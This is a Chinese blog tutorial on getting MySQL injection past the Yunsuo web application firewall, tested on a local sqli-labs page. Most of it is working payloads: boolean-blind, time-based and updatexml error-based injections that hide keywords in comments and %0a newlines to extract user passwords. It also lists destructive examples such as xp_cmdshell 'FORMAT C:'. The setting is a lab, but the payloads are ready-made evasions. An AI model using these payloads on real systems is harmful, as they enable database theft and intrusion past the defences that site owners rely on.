MYSQL注入 BYPASS-2-5-云锁 bypass绕过

释放双眼,带上耳机,听听看~!

SQL注入(英语:SQL injection),也称SQL注入或SQL注码,是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。

0x00 简单and探索

首先都是来测试下 and的绕过

and 不拦截

and 1 拦截

and a 不拦截

and 'a' 不拦截

and 'a' > < =  拦截

差不多知道他的规则了 绕过来就很简单了

mysql> select 'a'-0;
+-------+
| 'a'-0 |
+-------+
|     0 |
+-------+
1 row in set, 1 warning (0.00 sec)

mysql> select 'a'+1;
+-------+
| 'a'+1 |
+-------+
|     1 |
+-------+
1 row in set, 1 warning (0.00 sec)

mysql> select 'a'|1;
+-------+
| 'a'|1 |
+-------+
|     1 |
+-------+
1 row in set, 1 warning (0.00 sec)


and 'a'-0  不拦截

and 'a'|1  不拦截

0x01 我与云锁有个约会

早期云锁绕过非常简单,只需要在post 和 get 同时提交数据 他会只检测post的内容,很轻松的绕过,但是更新后云锁也是很多人谈之色变的。

以下内容都是把云锁的增强型防护开启

  1. 简单的布尔盲注
and strcmp((substr((select user/**/()),2,1)),'0')

生僻函数绕过 这里比较难的点其实也在from,但是比云盾好点,毕竟可以用到注释

http://192.168.130.135/Less-1/?id=1'  and strcmp((substr((select from),2,1)),'0')-- +  拦截

http://192.168.130.135/Less-1/?id=1'  and strcmp((substr((select /*from*/),2,1)),'0')-- + 不拦截

看到这两条语句其实我们可以清楚的知道/**/ 是我们可以利用的点,结合前面的知识我们只需要把我们的from放在注释里面然后把注释不起作用就OK

http://192.168.130.135/Less-1/?id=1'  and strcmp((substr((select password/* -- + %0afrom/**/users limit 0,1),1,1)),'D')-- +

mysql

  1. 时间盲注

时间盲注换换就行

http://192.168.130.135/Less-1/?id=1'  and if((strcmp((substr((select password/* -- + %0afrom/**/users limit 0,1),1,1)),'D')),1,sleep(5))-- +

  1. 报错注入
http://192.168.130.135/Less-1/?id=1'  and `updatexml`(1,concat(0x7e,(select user/**/()),0x7e),1)/**/-- +

其他的自己探索吧,bypass也就一个知识量和思路的结合

mysql

可能造成的伤害

数据表中的数据外泄,例如企业及个人机密数据,账户数据,密码等。

数据结构被黑客探知,得以做进一步攻击(例如SELECT * FROM sys.tables)。

数据库服务器被攻击,系统管理员账户被窜改(例如ALTER LOGIN sa WITH PASSWORD=’xxxxxx’)。

获取系统较高权限后,有可能得以在网页加入恶意链接、恶意代码以及Phishing等。

经由数据库服务器提供的操作系统支持,让黑客得以修改或控制操作系统(例如xp_cmdshell “net stop iisadmin”可停止服务器的IIS服务)。

黑客经由上传php简单的指令至对方之主机内,PHP之强大系统命令,可以让黑客进行全面控制系统(例如:php一句话木马)。

破坏硬盘数据,瘫痪全系统(例如xp_cmdshell “FORMAT C:”)。

获取系统最高权限后,可针对企业内部的任一管理系统做大规模破坏,甚至让其企业倒闭。

企业网站主页被窜改,门面尽失。

避免的方法

在设计应用程序时,完全使用参数化查询(Parameterized Query)来设计数据访问功能。

在组合SQL字符串时,先针对所传入的参数加入其他字符(将单引号字符前加上转义字符)。

如果使用PHP开发网页程序的话,需加入转义字符之功能(自动将所有的网页传入参数,将单引号字符前加上转义字符)。

使用php开发,可写入html特殊函数,可正确阻挡XSS攻击。

其他,使用其他更安全的方式连接SQL数据库。例如已修正过SQL注入问题的数据库连接组件,例如ASP.NET的SqlDataSource对象或是 LINQ to SQL。

使用SQL防注入系统。

增强WAF的防御力

本文如有错误,请及时提醒,避免误导他人

@404 aleenzz

公众号:aleenzz

人已赞赏
安全工具安全教程

MYSQL注入 BYPASS-2-1-联合注入过狗

2019-11-17 13:46:22

安全工具

bugKu--不好用的ce

2019-11-17 14:43:08

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索